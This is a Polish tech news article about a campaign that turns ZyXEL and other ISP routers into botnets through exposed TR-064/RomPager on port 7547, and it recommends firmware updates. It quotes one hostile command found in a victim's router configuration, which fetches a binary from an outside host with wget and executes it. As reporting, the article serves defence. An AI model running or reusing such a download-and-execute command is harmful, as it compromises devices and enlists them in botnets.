Nawet kilkadziesiąt tysięcy routerów może paść ofiarą nowego cyberataku. Najlepszym sposobem obrony jest aktualizacja oprogramowania.
Nawet kilkadziesiąt tysięcy użytkowników w Polsce (a konkretnie ich routerów) może być narażonych na cyberataki, mające na celu tworzenie botnetów wykorzystywanych później do niecnych celów.
O całej sprawie poinformował serwis Zaufana Trzecia Strona, któremu o problemie doniósł jeden z użytkowników. Zaniepokojony restartami swojego routera sprawdził on konfigurację i dostrzegł w niej podejrzany wpis „cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2”. Laboratorium wspomnianego serwisu podjęło się analizie problemu i odkryło, że problem może być dość poważny.
Teoretycznie podatnych na atak urządzeń dostępowych (czyli takich z otwartym portem 7547 i usługą RomPager) jest ponad 65 tysięcy. Liczba ta pochodzi jednak z Shodana, co oznacza, że może zawierać częściowo nieaktualne dane. Aby router (przede wszystkim firmy ZyXEL) mógł paść ofiarą, muszą wystąpić dwie okoliczności, a mówiąc konkretnie: dwa błędy – zbyt szeroka dostępność protokołu TR-064 i możliwość wykonania poleceń powłoki.
Dokładną analizę ataku znajdziecie w serwisie Zaufana Trzecia Strona.
Przed problemem można uchronić się w sposób prosty, a przez wiele osób niedoceniany. Mówimy tutaj o zwykłej aktualizacji oprogramowania urządzenia dostępowego.
Źródło: Zaufana Trzecia Strona
![Amerykańskie wojsko i sztuczna inteligencja. Dzień Sądu jest bliski? [OPINIA]](http://cdn.benchmark.pl/thumbs/uploads/article/93801/MODERNICON/dfef86e432c60118ce8ad99b59ec2355fab92f34.jpg/470x0x1.jpg)
![AI nie będzie nam wybierało rządu! A może będzie? [OPINIA]](http://cdn.benchmark.pl/thumbs/uploads/article/93577/MODERNICON/2b77f552fbfa26c7e99620bb643f2dea6b143fd0.jpg/470x0x1.jpg)
Komentarze
18